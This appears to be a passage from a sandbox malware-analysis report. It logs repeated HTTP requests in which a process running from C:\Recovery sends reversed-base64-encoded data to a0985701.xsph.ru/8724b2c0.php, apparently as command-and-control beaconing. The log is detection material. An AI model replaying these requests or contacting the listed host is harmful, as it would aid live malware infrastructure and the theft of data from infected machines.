            Data Raw: 3d 3d 51 66 69 51 6a 5a 68 52 47 4f 31 45 6a 5a 33 59 47 4f 30 55 44 4d 79 63 6a 4d 69 5a 6d 59 34 45 57 4d 30 45 7a 4d 6c 6c 54 59 6b 46 57 59 69 6f 6a 49 6d 52 6a 5a 6a 4e 57 4e 35 51 47 4f 34 55 6d 4d 77 4d 6d 4e 7a 6b 54 4e 79 49 6d 4e 31 49 6d 59 32 49 44 4f 78 55 47 4f 33 49 6d 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED]
            Data Ascii: ==QfiQjZhRGO1EjZ3YGO0UDMycjMiZmY4EWM0EzMllTYkFWYiojImRjZjNWN5QGO4UmMwMmNzkTNyImN1ImY2IDOxUGO3ImIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkanJTTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNlXTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNUS41ERVl2T [TRUNCATED]
            May 24, 2024 11:07:08.912414074 CEST1108INData Raw: 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 57 4b 68 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 62 30 6c 6e 59 78 73 32 5a 6b 4a 6a 56 50 6c 6b 61 76 6c 6d 57 58 46 44 61 55 31 57 4e 32 46
            Data Ascii: zlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjWVRTaPlmS1JmMs5mWYpkZi1GbuR2V4dnYyYlbJlWQnNUa3lWYzokdXNlQzoV
            May 24, 2024 11:07:09.140894890 CEST2132OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:09.472405910 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:09 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449731141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:09.200311899 CEST731OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:09.894076109 CEST158INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:09 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 0
            Connection: keep-alive
            May 24, 2024 11:07:09.899969101 CEST1246OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2N [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:10.118223906 CEST158INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:10 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 0
            Connection: keep-alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.449732141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:14.552726984 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:15.258023024 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:15 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.449739141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:20.288510084 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:21.089430094 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:20 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.449740141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:26.110286951 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:07:26.794965029 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:26 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.449741141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:31.817857027 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:32.531474113 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:32 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.449742141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:07:37.554546118 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:07:38.248681068 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:07:38 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.449743141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
